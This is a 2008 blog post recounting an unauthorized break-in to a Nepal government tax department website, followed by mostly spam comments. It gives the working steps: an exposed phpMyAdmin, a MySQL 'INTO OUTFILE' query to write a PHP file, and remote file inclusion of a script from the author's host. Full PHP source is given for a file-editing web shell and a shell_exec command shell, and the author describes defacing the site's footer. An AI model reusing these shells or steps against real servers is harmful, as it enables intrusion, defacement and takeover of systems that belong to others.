Do Comment and I shall comment back. Your contributions are always welcome at emailadimn@gmail.com.
Nepali Security Community Accessible at NepSecure Google Groups

Sunday, January 6, 2008

Nepal Government's Inland Revenue Department (web.ird.gov.np) (Nepali) Website Cracked

please do not take this posting as an offense against your website. Our motive is to let you know insecurities in your website and also give options to improve them.

Information
Its been quite some time the inland revenue department's website was upped, there are features like e-pan, filling PAN bills, tax bills online. The website lists the general idea about IRD and stuffs.

Level of Vulnerability
9/10 - i was able to run commands, DOS commands in it!! del C:\*.*, kidding!!

Background
The website actually seems to be hosted in two different servers,
1) http://ird.gov.np
$ nslookup ird.gov.np
Non-authoritative answer:
Name: ird.gov.np
Address: 63.219.2.40

2) another subdomain, http://web.ird.gov.np
nslookup web.ird.gov.np
Non-authoritative answer:
Name: web.ird.gov.np
Address: 116.90.235.4

Looking at the website, information is arranged in pages, the urls have page=xyz type of syntax, umm, XSS?? and the table based layout! (1980s? albiet exageration) and the background image repeating in x, they can't even create a css entry, repeat: none; Optimized for 800x640 resolution and they forgot 1024x768?? Overall, very very disappointed. Footer has "Designed and Developed by Professional Computer System" What a shame!!

The Crack
Strangely I dont know why, I typed http://web.ird.gov.np/phpmyadmin/ and to my delight, it was unsecured!! unprotected virgin phpmyadmin, Althought the databases were empty. Meaning the core database is somewhere else, pirated Oracle Server ;-) my guess only!

So, Im stuck with a virgin phpmyadmin, what more can be done?
An hour of research!! and I found out that there is actually a mysql syntax to store output to a file!

Here is what I did,
Step
1) Went to the Query Section of PHPMyadmin
2) Execute this SQL
select "" into outfile '/url/to/www/root/page.php'

3) Hurrah! we got a working page.php ie, http://web.ird.gov.np/pan/page.php that takes arguement a url to a any file, also remote file! YES it can be this easy!
example, http://web.ird.gov.np/pan/page.php?page=http://someaddress/c.txt?asdf :-) NICE

4) Fire up my localserver, user ip address, say 10.10.10.10 (assuming)

5) First I executed this php script
1 <?php
2 $a = '
3 <?php
4 // if not empty $_POST["fname"] then save the content
5 if (!empty($_POST["fname"])) {
6 echo "Save Now";
7 file_put_contents($_POST["fname"], $_POST["fc"]); // by default overwrite, put FILE_APPEND as 3rd arguement to append
8 }
9 else
10 {
11 echo "No Save";
12 }
13
14 $f = file_get_contents($_GET["f"]); ?>
15 <form method="post">
16 <input type=hidden value=<?php echo $_GET["f"];?> name=fname />
17 <textarea rows=25 cols=100 name=fc><?php echo $f; ?></textarea>
18 <input type=submit value="save">
19 </form>
20 <?php echo $_POST["fname"]; ?>
21 <pre>
22 <? echo htmlspecialchars(stripslashes($_POST["fc"]),ENT_QUOTES); ?>
23 </pre>';
24
25 file_put_contents('./sth.php',$a);
26 echo "Output successful";
27 ?>


What it does is, saves the php
1 <?php
2 // if not empty $_POST["fname"] then save the content
3 if (!empty($_POST["fname"])) {
4 echo "Save Now";
5 file_put_contents($_POST["fname"], stripslashes($_POST["fc"])); // by default overwrite, put FILE_APPEND as 3rd arguement to append
6 }
7 else
8 {
9 echo "No Save";
10 }
11
12 $f = file_get_contents($_GET["f"]); ?>
13 <form method="post">
14 <input type=hidden value=<?php echo $_GET["f"];?> name=fname />
15 <textarea rows=25 cols=100 name=fc><?php echo $f; ?></textarea>
16 <input type=submit value="save">
17 </form>
18 <?php echo $_POST["fname"]; ?>
19 <pre>
20 <?php echo htmlspecialchars(stripslashes($_POST["fc"]),ENT_QUOTES); ?>
21 </pre>


Under filename sth.php, but then what does sth.php do? if you see the arguements it takes the get arguement f as the filename, loads the file from server, ready to be edited, works like a charm
1 <?php $f = file_get_contents($_GET["f"]); ?>


6) How did i execute it? renamed the script to c.txt and run
http://web.ird.gov.np/pan/page.php?page=http://10.10.10.10/c.txt?asdf and voila, i have a brand new sth.php to work with,

7) As a part of demo, I edited footer.php file to put hacked by n00b in it, here is a screen capture



8) Lastly to have some fun, i created a php file to run any commands by using system() function, here is the php file

1 <?php
2 if (!empty($_POST["test"])) {
3 $output = $_POST["test"]."2>&1";
4 echo "<pre>" . shell_exec($output) . "</pre>";
5 }?>
6 <form method="post">
7 <input name="test"/>
8 <input type="submit" value="send"/>
9 </form>


The server was unsecured Wamp, so i could do dir, copy, move, it was a virtual DOS!! :-D

How to fix it?
Well Duh!! Wamp is for home user, and for production use, it should be secured!! see wamp homepage for more details!

The admins of http://ird.gov.np have already been informed, and they have fixed it up very quickly, im glad, but the design looks same, no improvement, no nothing.

Atleast it wasn't another iranian hack!! Im not all badass! :-D

8 comments:

Aakar said...

खै त सबैभन्दा नयाँ स्टफ को अपडेट ? http://mofa.gov.np/ यसको बारेमा लेखौँ न ।
अनि मंगलमान ले नेपाली ठिक गरिदिएछन्, यो त राम्रै हो । यो भन्दा अगाडि आउँदा, शीर्षक मै प्रोबलम थियो, ब्लगको । anyway... thanks for those interesting information..

regards,
aAkaR
http://aakarpost.blogspot.com

Nepali said...

Thanks for making aware.....

Great job ..

learn3r aka cyb3r lord said...

nice site...
INTO OUTFILE requires FILE level privilege to get executed and this means they were either running from root or other user with equivalent privilege. Lol wtf? Pwn3d...

Alice Thomas said...
This comment has been removed by the author.
Unknown said...

Thanks for sharing this great Post dude
CMS Develpoment In Bangalore

Unknown said...

I was very pleased to find this site. I wanted to thank you for this great read!! I definitely enjoyed every little bit of it and I have you bookmarked to check out the new stuff you post.
Free hosting coupons India

Anonymous said...

It is useful for to find your site position in many search engines.
Computer Training Ny

Unknown said...

I was very pleased to find this site. I wanted to thank you for this great read!! I definitely enjoyed every little bit of it and I have you bookmarked to check out the new stuff you post.
Gold price in Nepal